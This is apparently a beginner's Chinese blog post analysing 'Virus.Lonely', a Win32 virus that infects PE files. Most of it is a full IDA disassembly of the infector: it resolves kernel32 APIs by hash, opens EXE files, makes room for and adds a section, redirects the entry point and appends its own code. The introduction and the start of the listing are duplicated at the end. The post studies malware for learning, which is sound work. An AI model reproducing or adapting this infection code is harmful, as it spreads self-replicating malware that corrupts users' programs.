菜鸟的病毒分析5 pe感染文件感染病毒
pe文件感染病毒
感觉好长时间没写了,这个pe结构着实让我很头痛,花了很长时间了解它。现在终于了解一点点了,下手分析一下win32简单的病毒。具体的有关于pe结构seh结构的问题去看雪上看看有很多的。win32留给病毒的位置不多因为留给节表的位置不够节表头的大小有40字节,如果自己想向pe文件添加一个节的话那么就要先凑够这40个字节。这个病毒就是巧妙的将pe头与dos头融合在一起留出足够的空间添加一个节。
病毒行为:感染特定标题的exe文件(这个完全是因为作者想要控制病毒的感染力),注入病毒,在源程序之前运行病毒代码。
流程:查找kernel32,获取kernel32基址。获取函数中用到的kernel32中api,导入user32,获取用到的user32中的api。打开文件判断是否被感染过,如果没有,判断留下的空间能不能添加一个节,不能就进行pe的变形。添加一个节。更改程序入口到病毒处,在文件尾添加病毒。病毒发作的体现是调出一个messagebox。
onely:00401000 ;
.Lonely:00401000 ; +-------------------------------------------------------------------------+
.Lonely:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.Lonely:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.Lonely:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.Lonely:00401000 ; +-------------------------------------------------------------------------+
.Lonely:00401000 ;
.Lonely:00401000 ; Input MD5 : 9FF89869A75E64324CC871CD7CAD018B
.Lonely:00401000
.Lonely:00401000 ; File Name : C:\26222\Virus.Lonely.exe
.Lonely:00401000 ; Format : Portable executable for 80386 (PE)
.Lonely:00401000 ; Imagebase : 400000
.Lonely:00401000 ; Section 1. (virtual address 00001000)
.Lonely:00401000 ; Virtual size : 000003BC ( 956.)
.Lonely:00401000 ; Section size in file : 00000400 ( 1024.)
.Lonely:00401000 ; Offset to raw data for section: 00000200
.Lonely:00401000 ; Flags E0000020: Text Executable Readable Writable
.Lonely:00401000 ; Alignment : default
.Lonely:00401000
.Lonely:00401000 .686p
.Lonely:00401000 .mmx
.Lonely:00401000 .model flat
.Lonely:00401000
.Lonely:00401000 ; ===========================================================================
.Lonely:00401000
.Lonely:00401000 ; Segment type: Pure code
.Lonely:00401000 ; Segment permissions: Read/Write/Execute
.Lonely:00401000 _Lonely segment para public 'CODE' use32
.Lonely:00401000 assume cs:_Lonely
.Lonely:00401000 ;org 401000h
.Lonely:00401000 assume es:nothing, ss:nothing, ds:_Lonely, fs:nothing, gs:nothing
.Lonely:00401000
.Lonely:00401000 ; =============== S U B R O U T I N E =======================================
.Lonely:00401000
.Lonely:00401000
.Lonely:00401000 public start
.Lonely:00401000 start proc near ; DATA XREF: .Lonely:0040126Er
.Lonely:00401000 pusha
.Lonely:00401001 call near ptr sub_40100C
.Lonely:00401006
.Lonely:00401006 loc_401006: ; DATA XREF: sub_40100C+1o
.Lonely:00401006 int 3 ; - software interrupt to invoke the debugger
.Lonely:00401008 int 3 ; - software interrupt to invoke the debugger
.Lonely:0040100A int 3 ; - software interrupt to invoke the debugger
.Lonely:0040100A start endp ; sp-analysis failed
.Lonely:0040100A
.Lonely:0040100C
.Lonely:0040100C ; =============== S U B R O U T I N E =======================================
.Lonely:0040100C
.Lonely:0040100C
.Lonely:0040100C sub_40100C proc far ; CODE XREF: start+1p
.Lonely:0040100C
.Lonely:0040100C arg_C = dword ptr 10h
.Lonely:0040100C
.Lonely:0040100C ; FUNCTION CHUNK AT .Lonely:00401062 SIZE 0000004D BYTES
.Lonely:0040100C
.Lonely:0040100C pop ebp
.Lonely:0040100D sub ebp, offset loc_401006
.Lonely:00401013 call sub_4010C8 ; 取基址给eax
.Lonely:00401018 lea edi, closehandle[ebp]
.Lonely:0040101E push edi
.Lonely:0040101F push eax
.Lonely:00401020 call sub_4010E9 ; 搜索api地址
.Lonely:00401020 ;
.Lonely:00401025 call loc_401031 ; 主体
.Lonely:0040102A jnz short near ptr loc_40109C+3
.Lonely:0040102C db 65h
.Lonely:0040102C jb short loc_401062
.Lonely:0040102F xor al, [eax]
.Lonely:0040102F sub_40100C endp ; sp-analysis failed
.Lonely:0040102F
.Lonely:00401031
.Lonely:00401031 loc_401031: ; CODE XREF: sub_40100C+19p
.Lonely:00401031 call dword ptr [edi+54h] ; loadlibrary user32
.Lonely:00401031 ;
.Lonely:00401034 push edi
.Lonely:00401035 push eax
.Lonely:00401036 call sub_4010E9 ; 获取api地址
.Lonely:0040103B test ebp, ebp
.Lonely:0040103D jz short loc_4010B3
.Lonely:0040103F push 0
.Lonely:00401041 call near ptr loc_401050+1
.Lonely:00401046 push esi
.Lonely:00401047 imul esi, [edx+75h], 65442073h
.Lonely:0040104E insd
.Lonely:0040104F outsd
.Lonely:00401050
.Lonely:00401050 loc_401050: ; CODE XREF: .Lonely:00401041p
.Lonely:00401050 add al, ch
.Lonely:00401052 aaa
.Lonely:00401052 ; ---------------------------------------------------------------------------
.Lonely:00401053 db 0
.Lonely:00401054 dd 79620000h, 6966783Ah, 68206873h
.Lonely:00401060 db 2 dup(74h)
.Lonely:00401062 ; ---------------------------------------------------------------------------
.Lonely:00401062 ; START OF FUNCTION CHUNK FOR sub_40100C
.Lonely:00401062
.Lonely:00401062 loc_401062: ; CODE XREF: sub_40100C+20j
.Lonely:00401062 jo short near ptr loc_40109C+2
.Lonely:00401064 das
.Lonely:00401065 das
.Lonely:00401066 ja short loc_4010DF
.Lonely:00401068 ja short loc_401098
.Lonely:0040106A jo short near ptr loc_4010D0+1
.Lonely:0040106C imul edi, fs:[ecx+2Eh], 206D6F63h
.Lonely:00401074 push 3A707474h
.Lonely:00401079 das
.Lonely:0040107A das
.Lonely:0040107B ja short near ptr loc_4010F1+3
.Lonely:0040107D ja short near ptr locret_4010AC+1
.Lonely:0040107F push 656B6361h
.Lonely:00401084 jb short near ptr loc_4010B3+1
.Lonely:00401086 arpl [edi+6Dh], bp
.Lonely:00401089 arpl cs:[esi+0], bp
.Lonely:0040108D push 0
.Lonely:0040108F call dword ptr [edi+5Ch]
.Lonely:00401092 push ss:off_401357[ebp]
.Lonely:00401098
.Lonely:00401098 loc_401098: ; CODE XREF: sub_40100C+5Cj
.Lonely:00401098 pop [esp+0Ch+arg_C]
.Lonely:0040109C
.Lonely:0040109C loc_40109C: ; CODE XREF: sub_40100C:loc_401062j
.Lonely:0040109C ; sub_40100C+1Ej
.Lonely:0040109C call near ptr loc_4010AA+1
.Lonely:004010A1 jz short near ptr loc_401107+1
.Lonely:004010A3 jnb short loc_401119
.Lonely:004010A5 xor ch, [esi]
.Lonely:004010A7 db 65h
.Lonely:004010A7 js short near ptr loc_40110E+1
.Lonely:004010AA
.Lonely:004010AA loc_4010AA: ; CODE XREF: sub_40100C:loc_40109Cp
.Lonely:004010AA add al, ch
.Lonely:004010AC
.Lonely:004010AC locret_4010AC: ; CODE XREF: sub_40100C+71j
.Lonely:004010AC retf 0
.Lonely:004010AC ; END OF FUNCTION CHUNK FOR sub_40100C
.Lonely:004010AC ; ---------------------------------------------------------------------------
.Lonely:004010AF align 10h
.Lonely:004010B0 popa
.Lonely:004010B1 push eax
.Lonely:004010B2 retn
.Lonely:004010B3 ; ---------------------------------------------------------------------------
.Lonely:004010B3
.Lonely:004010B3 loc_4010B3: ; CODE XREF: .Lonely:0040103Dj
.Lonely:004010B3 ; sub_40100C+78j
.Lonely:004010B3 call near ptr loc_4010C0+1
.Lonely:004010B8 jz short near ptr loc_40111C+3
.Lonely:004010BA jnb short near ptr loc_40112F+1
.Lonely:004010BC db 2Eh, 65h
.Lonely:004010BC js short near ptr loc_401124+1
.Lonely:004010C0
.Lonely:004010C0 loc_4010C0: ; CODE XREF: .Lonely:loc_4010B3p
.Lonely:004010C0 add al, ch ; 这里解析错误应该跳转到0040117Ah
.Lonely:004010C2 mov ah, 0
.Lonely:004010C2 ; ---------------------------------------------------------------------------
.Lonely:004010C4 dd 0C3610000h
.Lonely:004010C8
.Lonely:004010C8 ; =============== S U B R O U T I N E =======================================
.Lonely:004010C8
.Lonely:004010C8
.Lonely:004010C8 sub_4010C8 proc near ; CODE XREF: sub_40100C+7p
.Lonely:004010C8 sub eax, eax ;这一段就是获取
.Lonely:004010CA mov eax, fs:[eax+30h]
.Lonely:004010CE test eax, eax
.Lonely:004010D0
.Lonely:004010D0 loc_4010D0: ; CODE XREF: sub_40100C+5Ej
.Lonely:004010D0 js short loc_4010DF
.Lonely:004010D2 mov eax, [eax+0Ch]
.Lonely:004010D5 mov eax, [eax+1Ch]
.Lonely:004010D8 mov eax, [eax]
.Lonely:004010DA mov eax, [eax+8]
.Lonely:004010DD jmp short locret_4010E8
.Lonely:004010DF ; ---------------------------------------------------------------------------
.Lonely:004010DF
.Lonely:004010DF loc_4010DF: ; CODE XREF: sub_40100C+5Aj
.Lonely:004010DF ; sub_4010C8:loc_4010D0j
.Lonely:004010DF mov eax, [eax+34h]
.Lonely:004010E2 lea eax, [eax+7Ch]
.Lonely:004010E5 mov eax, [eax+3Ch]
.Lonely:004010E8
.Lonely:004010E8 locret_4010E8: ; CODE XREF: sub_4010C8+15j
.Lonely:004010E8 retn
.Lonely:004010E8 sub_4010C8 endp
.Lonely:004010E8
.Lonely:004010E9
.Lonely:004010E9 ; =============== S U B R O U T I N E =======================================
.Lonely:004010E9
.Lonely:004010E9
.Lonely:004010E9 sub_4010E9 proc near ; CODE XREF: sub_40100C+14p
.Lonely:004010E9 ; .Lonely:00401036p
.Lonely:004010E9
.Lonely:004010E9 var_24 = dword ptr -24h
.Lonely:004010E9 arg_0 = dword ptr 4
.Lonely:004010E9 arg_4 = dword ptr 8
.Lonely:004010E9
.Lonely:004010E9 pusha
.Lonely:004010EA mov ebx, [esp+20h+arg_0]
.Lonely:004010EE mov edx, [ebx+3Ch]
.Lonely:004010F1
.Lonely:004010F1 loc_4010F1: ; CODE XREF: sub_40100C+6Fj
.Lonely:004010F1 mov esi, [ebx+edx+78h]
.Lonely:004010F5 lea esi, [esi+ebx+18h]
.Lonely:004010F9 lodsd
.Lonely:004010FA xchg eax, ecx
.Lonely:004010FB lodsd
.Lonely:004010FC add eax, ebx
.Lonely:004010FE xchg eax, ebp
.Lonely:004010FF lodsd
.Lonely:00401100 add eax, ebx
.Lonely:00401102 xchg eax, edx
.Lonely:00401103 lodsd
.Lonely:00401104 add eax, ebx
.Lonely:00401106 push eax
.Lonely:00401107
.Lonely:00401107 loc_401107: ; CODE XREF: sub_40100C+95j
.Lonely:00401107 mov esi, edx
.Lonely:00401109
.Lonely:00401109 loc_401109: ; CODE XREF: sub_4010E9:loc_40113Cj
.Lonely:00401109 lodsd
.Lonely:0040110A add eax, ebx
.Lonely:0040110C xor edx, edx
.Lonely:0040110E
.Lonely:0040110E loc_40110E: ; CODE XREF: sub_4010E9+2Ej
.Lonely:0040110E ; sub_40100C+9Bj
.Lonely:0040110E rol edx, 3
.Lonely:00401111 xor dl, [eax]
.Lonely:00401113 inc eax
.Lonely:00401114 cmp byte ptr [eax], 0
.Lonely:00401117 jnz short loc_40110E
.Lonely:00401119
.Lonely:00401119 loc_401119: ; CODE XREF: sub_40100C+97j
.Lonely:00401119 mov eax, [esp+24h+var_24]
.Lonely:0040111C
.Lonely:0040111C loc_40111C: ; CODE XREF: .Lonely:004010B8j
.Lonely:0040111C add [esp+24h+var_24], 2
.Lonely:00401120 mov edi, [esp+24h+arg_4]
.Lonely:00401124
.Lonely:00401124 loc_401124: ; CODE XREF: sub_4010E9+51j
.Lonely:00401124 ; .Lonely:004010BCj
.Lonely:00401124 cmp [edi], edx
.Lonely:00401126 jnz short loc_401135
.Lonely:00401128 movzx eax, word ptr [eax]
.Lonely:0040112B mov eax, [ebp+eax*4+0]
.Lonely:0040112F
.Lonely:0040112F loc_40112F: ; CODE XREF: .Lonely:004010BAj
.Lonely:0040112F add eax, ebx
.Lonely:00401131 scasd
.Lonely:00401132 stosd
.Lonely:00401133 jmp short loc_40113C
.Lonely:00401135 ; ---------------------------------------------------------------------------
.Lonely:00401135
.Lonely:00401135 loc_401135: ; CODE XREF: sub_4010E9+3Dj
.Lonely:00401135 scasd
.Lonely:00401136 scasd
.Lonely:00401137 cmp dword ptr [edi], 0
.Lonely:0040113A jnz short loc_401124
.Lonely:0040113C
.Lonely:0040113C loc_40113C: ; CODE XREF: sub_4010E9+4Aj
.Lonely:0040113C loop loc_401109
.Lonely:0040113E pop ecx
.Lonely:0040113F popa
.Lonely:00401140 retn 8
.Lonely:00401140 sub_4010E9 endp
.Lonely:00401140
.Lonely:00401143
.Lonely:00401143 ; =============== S U B R O U T I N E =======================================
.Lonely:00401143
.Lonely:00401143 ; 判断是不是pe文件
.Lonely:00401143
.Lonely:00401143 sub_401143 proc near ; CODE XREF: .Lonely:004011EEp
.Lonely:00401143
.Lonely:00401143 arg_0 = dword ptr 4
.Lonely:00401143
.Lonely:00401143 mov edx, [esp+arg_0]
.Lonely:00401147 cmp word ptr [edx], 'ZM'
.Lonely:0040114C jnz short loc_40115C
.Lonely:0040114E add edx, [edx+3Ch]
.Lonely:00401151 cmp word ptr [edx], 'EP'
.Lonely:00401156 jnz short loc_40115C
.Lonely:00401158 stc
.Lonely:00401159 retn 4
.Lonely:0040115C ; ---------------------------------------------------------------------------
.Lonely:0040115C
.Lonely:0040115C loc_40115C: ; CODE XREF: sub_401143+9j
.Lonely:0040115C ; sub_401143+13j
.Lonely:0040115C clc
.Lonely:0040115D retn 4
.Lonely:0040115D sub_401143 endp
.Lonely:0040115D
.Lonely:00401160
.Lonely:00401160 ; =============== S U B R O U T I N E =======================================
.Lonely:00401160
.Lonely:00401160
.Lonely:00401160 sub_401160 proc near ; CODE XREF: .Lonely:00401180p
.Lonely:00401160
.Lonely:00401160 arg_0 = dword ptr 4
.Lonely:00401160
.Lonely:00401160 push 0
.Lonely:00401162 push esp
.Lonely:00401163 push [esp+8+arg_0]
.Lonely:00401167 call ss:getbinarytypea_0[ebp]
.Lonely:0040116D pop eax
.Lonely:0040116E test eax, eax
.Lonely:00401170 jnz short loc_401176
.Lonely:00401172 stc
.Lonely:00401173 retn 4
.Lonely:00401176 ; ---------------------------------------------------------------------------
.Lonely:00401176
.Lonely:00401176 loc_401176: ; CODE XREF: sub_401160+10j
.Lonely:00401176 clc
.Lonely:00401177 retn 4
.Lonely:00401177 sub_401160 endp
.Lonely:00401177
.Lonely:0040117A ; ---------------------------------------------------------------------------
.Lonely:0040117A pusha
.Lonely:0040117B mov esi, [esp+24h]
.Lonely:0040117F push esi
.Lonely:00401180 call sub_401160 ; 判断文件是不是32位文件
.Lonely:00401180 ;
.Lonely:00401185 jnb loc_401298 ; 不是跳转
.Lonely:00401185 ;
.Lonely:0040118B sub eax, eax
.Lonely:0040118D push eax
.Lonely:0040118E push eax
.Lonely:0040118F push 3
.Lonely:00401191 push eax
.Lonely:00401192 push 2
.Lonely:00401194 push 0C0000000h
.Lonely:00401199 push esi
.Lonely:0040119A call dword ptr ss:creatfile_1[ebp] ; 打开文件
.Lonely:004011A0 cmp eax, 0FFFFFFFFh ; 打开失败跳转到结束
.Lonely:004011A0 ; 成功eax返回局柄
.Lonely:004011A3 jz loc_401298
.Lonely:004011A9 xchg eax, ebx
.Lonely:004011AA push 0
.Lonely:004011AC push ebx
.Lonely:004011AD call ss:getfilesize[ebp] ; 获取文件大小 为后面读文件作准备
.Lonely:004011B3 push eax
.Lonely:004011B4 push 4
.Lonely:004011B6 push 1000h
.Lonely:004011BB push eax
.Lonely:004011BC push 0
.Lonely:004011BE call ss:virtualalloc_0[ebp] ; 开辟内存 读文件用
.Lonely:004011C4 pop edx
.Lonely:004011C5 test eax, eax
.Lonely:004011C7 jz loc_401291
.Lonely:004011CD xchg eax, edi
.Lonely:004011CE mov dword ptr ss:(loc_401285+1)[ebp], edx
.Lonely:004011D4 push 0
.Lonely:004011D6 push esp
.Lonely:004011D7 push dword ptr ss:(loc_401285+1)[ebp]
.Lonely:004011DD push edi
.Lonely:004011DE push ebx
.Lonely:004011DF call ss:readfile[ebp] ; 读文件
.Lonely:004011E5 test eax, eax
.Lonely:004011E7 jz loc_401280
.Lonely:004011ED push edi
.Lonely:004011EE call sub_401143 ; 判断是不是pe文件
.Lonely:004011F3 jnb loc_401280
.Lonely:004011F9 push 3BCh
.Lonely:004011FE push edi
.Lonely:004011FF call sub_40129C ; 添加节
.Lonely:00401204 test eax, eax
.Lonely:00401206 jz short loc_401280
.Lonely:00401208 mov eax, edi
.Lonely:0040120A add eax, [eax+3Ch] ; edi是文件头
.Lonely:0040120D mov ecx, edx
.Lonely:0040120F xchg ecx, [eax+28h] ; 程序入口rva
.Lonely:00401212 add ecx, [eax+34h] ; 程序基址
.Lonely:00401215 mov ss:off_401357[ebp], ecx
.Lonely:0040121B push 0
.Lonely:0040121D push 0
.Lonely:0040121F push 0
.Lonely:00401221 push ebx
.Lonely:00401222 call ss:setendoffile[ebp] ; 移动指针到文件头
.Lonely:00401228 push 0
.Lonely:0040122A push esp
.Lonely:0040122B lea eax, (loc_401285+1)[ebp]
.Lonely:00401231 push dword ptr [eax]
.Lonely:00401233 push edi
.Lonely:00401234 push ebx
.Lonely:00401235 call ss:writefile_0[ebp]
.Lonely:0040123B test eax, eax
.Lonely:0040123D jz short loc_401280
.Lonely:0040123F push 2
.Lonely:00401241 push 0
.Lonely:00401243 push 3BCh
.Lonely:00401248 push ebx
.Lonely:00401249 call ss:setendoffile[ebp]
.Lonely:0040124F push ebx
.Lonely:00401250 call ss:setfilepointer[ebp]
.Lonely:00401256 push 1
.Lonely:00401258 push 0
.Lonely:0040125A push 0FFFFFC44h
.Lonely:0040125F push ebx
.Lonely:00401260 call ss:setendoffile[ebp]
.Lonely:00401266 push 0
.Lonely:00401268 push esp
.Lonely:00401269 push 3BCh
.Lonely:0040126E lea eax, start[ebp]
.Lonely:00401274 push eax
.Lonely:00401275 push ebx
.Lonely:00401276 call ss:writefile_0[ebp]
.Lonely:0040127C test eax, eax
.Lonely:0040127E jz short $+2
.Lonely:00401280
.Lonely:00401280 loc_401280: ; CODE XREF: .Lonely:004011E7j
.Lonely:00401280 ; .Lonely:004011F3j ...
.Lonely:00401280 push 4000h
.Lonely:00401285
.Lonely:00401285 loc_401285: ; DATA XREF: .Lonely:loc_401285o
.Lonely:00401285 ; .Lonely:004011CEw ...
.Lonely:00401285 push offset loc_401285
.Lonely:0040128A push edi
.Lonely:0040128B call ss:writefile[ebp]
.Lonely:00401291
.Lonely:00401291 loc_401291: ; CODE XREF: .Lonely:004011C7j
.Lonely:00401291 push ebx
.Lonely:00401292 call dword ptr ss:unk_401360[ebp]
.Lonely:00401298
.Lonely:00401298 loc_401298: ; CODE XREF: .Lonely:00401185j
.Lonely:00401298 ; .Lonely:004011A3j
.Lonely:00401298 popa
.Lonely:00401299 retn 4
.Lonely:0040129C
.Lonely:0040129C ; =============== S U B R O U T I N E =======================================
.Lonely:0040129C
.Lonely:0040129C
.Lonely:0040129C sub_40129C proc near ; CODE XREF: .Lonely:004011FFp
.Lonely:0040129C
.Lonely:0040129C var_40 = dword ptr -40h
.Lonely:0040129C var_3C = dword ptr -3Ch
.Lonely:0040129C var_C = dword ptr -0Ch
.Lonely:0040129C var_4 = dword ptr -4
.Lonely:0040129C arg_0 = dword ptr 4
.Lonely:0040129C arg_4 = dword ptr 8
.Lonely:0040129C
.Lonely:0040129C pusha
.Lonely:0040129D mov ebx, [esp+20h+arg_0]
.Lonely:004012A1 mov esi, ebx
.Lonely:004012A3 add esi, [esi+3Ch] ; esi 指向pe头
.Lonely:004012A6 movzx ecx, word ptr [esi+14h]
.Lonely:004012AA lea edi, [esi+ecx+18h] ; edi 指向section table 头
.Lonely:004012AE lea edx, [esi+74h]
.Lonely:004012B1 cmp dword ptr [edx], 10h
.Lonely:004012B4 jl short loc_4012BD ; 磁盘文件 偏移
.Lonely:004012B6 mov dword ptr [edx+5Ch], 0
.Lonely:004012BD
.Lonely:004012BD loc_4012BD: ; CODE XREF: sub_40129C+18j
.Lonely:004012BD mov edx, [edi+14h] ; 磁盘文件 偏移
.Lonely:004012C0 add edx, ebx
.Lonely:004012C2 movzx ecx, word ptr [esi+6]
.Lonely:004012C6 imul ecx, 28h
.Lonely:004012C9 add edi, ecx
.Lonely:004012CB push edx
.Lonely:004012CC mov eax, edi
.Lonely:004012CE sub edx, eax
.Lonely:004012D0 cmp edx, 28h ; 这里在比较 能不能有空间添加节头
.Lonely:004012D3 pop edx
.Lonely:004012D4 jge short loc_401307 ; 添加节
.Lonely:004012D6 cmp word ptr [ebx+0Ch], 'EP' ; 比较是不是pe
.Lonely:004012DC jnz short loc_4012E6
.Lonely:004012DE xor eax, eax
.Lonely:004012E0 mov [esp+20h+var_4], eax
.Lonely:004012E4 jmp short loc_401352
.Lonely:004012E6 ; ---------------------------------------------------------------------------
.Lonely:004012E6
.Lonely:004012E6 loc_4012E6: ; CODE XREF: sub_40129C+40j
.Lonely:004012E6 sub eax, esi
.Lonely:004012E8 xchg eax, ecx
.Lonely:004012E9 pusha
.Lonely:004012EA lea edi, [ebx+0Ch]
.Lonely:004012ED mov [esp+40h+var_3C], edi
.Lonely:004012F1 cld
.Lonely:004012F2 rep movsb
.Lonely:004012F4 mov [esp+40h+var_40], edi
.Lonely:004012F7 sub edx, edi
.Lonely:004012F9 xchg ecx, edx
.Lonely:004012FB xor eax, eax
.Lonely:004012FD rep stosb
.Lonely:004012FF popa
.Lonely:00401300 mov dword ptr [ebx+3Ch], 0Ch
.Lonely:00401307
.Lonely:00401307 loc_401307: ; CODE XREF: sub_40129C+38j
.Lonely:00401307 inc word ptr [esi+6] ; 添加节
.Lonely:0040130B mov dword ptr [edi], 'ifx.'
.Lonely:00401311 mov word ptr [edi+4], 'hs'
.Lonely:00401317 push [esp+20h+arg_4]
.Lonely:0040131B pop dword ptr [edi+10h]
.Lonely:0040131E lea edx, [edi-28h]
.Lonely:00401321 mov eax, [edx+14h]
.Lonely:00401324 mov ecx, [edx+10h]
.Lonely:00401327 add eax, ecx
.Lonely:00401329 mov [edi+14h], eax
.Lonely:0040132C mov [esp+20h+var_4], eax
.Lonely:00401330 push [esp+20h+arg_4]
.Lonely:00401334 pop dword ptr [edi+8]
.Lonely:00401337 push dword ptr [esi+50h]
.Lonely:0040133A pop eax
.Lonely:0040133B mov [edi+0Ch], eax
.Lonely:0040133E mov [esp+20h+var_C], eax
.Lonely:00401342 mov dword ptr [edi+24h], 0E0000020h
.Lonely:00401349 mov ecx, [edi+8]
.Lonely:0040134C add ecx, [edi+0Ch]
.Lonely:0040134F mov [esi+50h], ecx
.Lonely:00401352
.Lonely:00401352 loc_401352: ; CODE XREF: sub_40129C+48j
.Lonely:00401352 popa
.Lonely:00401353 retn 8
.Lonely:00401353 sub_40129C endp
.Lonely:00401353
.Lonely:00401353 ; ---------------------------------------------------------------------------
.Lonely:00401356 byte_401356 db 68h ; DATA XREF: .Lonely:off_401357o
.Lonely:00401357 off_401357 dd offset byte_401356 ; DATA XREF: sub_40100C+86r
.Lonely:00401357 ; .Lonely:00401215w
.Lonely:0040135B ; ---------------------------------------------------------------------------
.Lonely:0040135B retn
.Lonely:0040135B ; ---------------------------------------------------------------------------
.Lonely:0040135C closehandle db 16h ; DATA XREF: sub_40100C+Cr
.Lonely:0040135D db 0D6h ; ?
.Lonely:0040135E db 0D6h ; ?
.Lonely:0040135F db 0C0h ; ?
.Lonely:00401360 unk_401360 db 0 ; DATA XREF: .Lonely:00401292r
.Lonely:00401361 db 0
.Lonely:00401362 db 0
.Lonely:00401363 db 0
.Lonely:00401364 creatfile_0 db 7Ah ; z
.Lonely:00401365 db 2Ah ; *
.Lonely:00401366 db 0C6h ; ?
.Lonely:00401367 db 38h ; 8
.Lonely:00401368 creatfile_1 db 0 ; DATA XREF: .Lonely:0040119Ar
.Lonely:00401369 db 0
.Lonely:0040136A db 0
.Lonely:0040136B getbinarytypea db 0
.Lonely:0040136C dd 0ABD10842h
.Lonely:00401370 getbinarytypea_0 dd 0 ; DATA XREF: sub_401160+7r
.Lonely:00401374 dd 9554EFE7h
.Lonely:00401378 getfilesize dd 0 ; DATA XREF: .Lonely:004011ADr
.Lonely:0040137C dd 0BE25545h
.Lonely:00401380 readfile dd 0 ; DATA XREF: .Lonely:004011DFr
.Lonely:00401384 dd 0A97175F9h
.Lonely:00401388 setfilepointer dd 0 ; DATA XREF: .Lonely:00401250r
.Lonely:0040138C dd 0A9D1FD70h
.Lonely:00401390 setendoffile dd 0 ; DATA XREF: .Lonely:00401222r
.Lonely:00401390 ; .Lonely:00401249r ...
.Lonely:00401394 dd 0AB16D0AEh
.Lonely:00401398 virtualalloc_0 dd 0 ; DATA XREF: .Lonely:004011BEr
.Lonely:0040139C dd 0B562D3DBh
.Lonely:004013A0 writefile dd 0 ; DATA XREF: .Lonely:0040128Br
.Lonely:004013A4 dd 58D8C545h
.Lonely:004013A8 writefile_0 dd 0 ; DATA XREF: .Lonely:00401235r
.Lonely:004013A8 ; .Lonely:00401276r
.Lonely:004013AC db 89h
.Lonely:004013AD db 0FDh ; ?
.Lonely:004013AE db 12h
.Lonely:004013AF db 0A4h ; ?
.Lonely:004013B0 db 0
.Lonely:004013B1 db 0
.Lonely:004013B2 db 0
.Lonely:004013B3 db 0
.Lonely:004013B4 db 51h
.Lonely:004013B5 db 4Ch ; L
.Lonely:004013B6 db 0D1h ; ?
.Lonely:004013B7 db 14h
.Lonely:004013B8 db 0
.Lonely:004013B9 db 0
.Lonely:004013BA db 0
.Lonely:004013BB db 0
.Lonely:004013BC db 0
.Lonely:004013BD db 0
.Lonely:004013BE db 0
.Lonely:004013BF db 0
.Lonely:004013C0 db 0
.Lonely:004013C1 db 0
.Lonely:004013C2 db 0
.Lonely:004013C3 db 0
.Lonely:004013C4 db 0
.Lonely:004013C5 db 0
.Lonely:004013C6 db 0
.Lonely:004013C7 db 0
.Lonely:004013C8 db 0
.Lonely:004013C9 db 0
.Lonely:004013CA db 0
.Lonely:004013CB db 0
.Lonely:004013CC db 0
.Lonely:004013CD db 0
.Lonely:004013CE db 0
.Lonely:004013CF db 0
.Lonely:004013D0 db 0
.Lonely:004013D1 db 0
.Lonely:004013D2 db 0
.Lonely:004013D3 db 0
.Lonely:004013D4 db 0
.Lonely:004013D5 db 0
.Lonely:004013D6 db 0
.Lonely:004013D7 db 0
.Lonely:004013D8 db 0
.Lonely:004013D9 db 0
.Lonely:004013DA db 0
.Lonely:004013DB db 0
.Lonely:004013DC db 0
.Lonely:004013DD db 0
.Lonely:004013DE db 0
.Lonely:004013DF db 0
.Lonely:004013E0 db 0
.Lonely:004013E1 db 0
.Lonely:004013E2 db 0
.Lonely:004013E3 db 0
.Lonely:004013E4 db 0
.Lonely:004013E5 db 0
.Lonely:004013E6 db 0
.Lonely:004013E7 db 0
.Lonely:004013E8 db 0
.Lonely:004013E9 db 0
.Lonely:004013EA db 0
.Lonely:004013EB db 0
.Lonely:004013EC db 0
.Lonely:004013ED db 0
.Lonely:004013EE db 0
.Lonely:004013EF db 0
.Lonely:004013F0 db 0
.Lonely:004013F1 db 0
.Lonely:004013F2 db 0
.Lonely:004013F3 db 0
.Lonely:004013F4 db 0
.Lonely:004013F5 db 0
.Lonely:004013F6 db 0
.Lonely:004013F7 db 0
.Lonely:004013F8 db 0
.Lonely:004013F9 db 0
.Lonely:004013FA db 0
.Lonely:004013FB db 0
.Lonely:004013FC db 0
.Lonely:004013FD db 0
.Lonely:004013FE db 0
.Lonely:004013FF db 0
.Lonely:004013FF _Lonely ends
感觉好长时间没写了,这个pe结构着实让我很头痛,花了很长时间了解它。现在终于了解一点点了,下手分析一下win32简单的病毒。具体的有关于pe结构seh结构的问题去看雪上看看有很多的。win32留给病毒的位置不多因为留给节表的位置不够节表头的大小有40字节,如果自己想向pe文件添加一个节的话那么就要先凑够这40个字节。这个病毒就是巧妙的将pe头与dos头融合在一起留出足够的空间添加一个节。
病毒行为:感染特定标题的exe文件(这个完全是因为作者想要控制病毒的感染力),注入病毒,在源程序之前运行病毒代码。
流程:查找kernel32,获取kernel32基址。获取函数中用到的kernel32中api,导入user32,获取用到的user32中的api。打开文件判断是否被感染过,如果没有,判断留下的空间能不能添加一个节,不能就进行pe的变形。添加一个节。更改程序入口到病毒处,在文件尾添加病毒。病毒发作的体现是调出一个messagebox。
onely:00401000 ;
.Lonely:00401000 ; +-------------------------------------------------------------------------+
.Lonely:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.Lonely:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.Lonely:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.Lonely:00401000 ; +-------------------------------------------------------------------------+
.Lonely:00401000 ;
.Lonely:00401000 ; Input MD5 : 9FF89869A75E64324CC871CD7CAD018B
.Lonely:00401000
.Lonely:00401000 ; File Name : C:\26222\Virus.Lonely.exe
.Lonely:00401000 ; Format : Portable executable for 80386 (PE)
.Lonely:00401000 ; Imagebase : 400000
.Lonely:00401000 ; Section 1. (virtual address 00001000)
.Lonely:00401000 ; Virtual size : 000003BC ( 956.)
.Lonely:00401000 ; Section size in file : 00000400 ( 1024.)
.Lonely:00401000 ; Offset to raw data for section: 00000200
.Lonely:00401000 ; Flags E0000020: Text Executable Readable Writable
.Lonely:00401000 ; Alignment : default
.Lonely:00401000
.Lonely:00401000 .686p
.Lonely:00401000 .mmx
.Lonely:00401000 .model flat
.Lonely:00401000
.Lonely:00401000 ; ===========================================================================
.Lonely:00401000
.Lonely:00401000 ; Segment type: Pure code
.Lonely:00401000 ; Segment permissions: Read/Write/Execute
.Lonely:00401000 _Lonely segment para public 'CODE' use32
.Lonely:00401000 assume cs:_Lonely
.Lonely:00401000 ;org 401000h
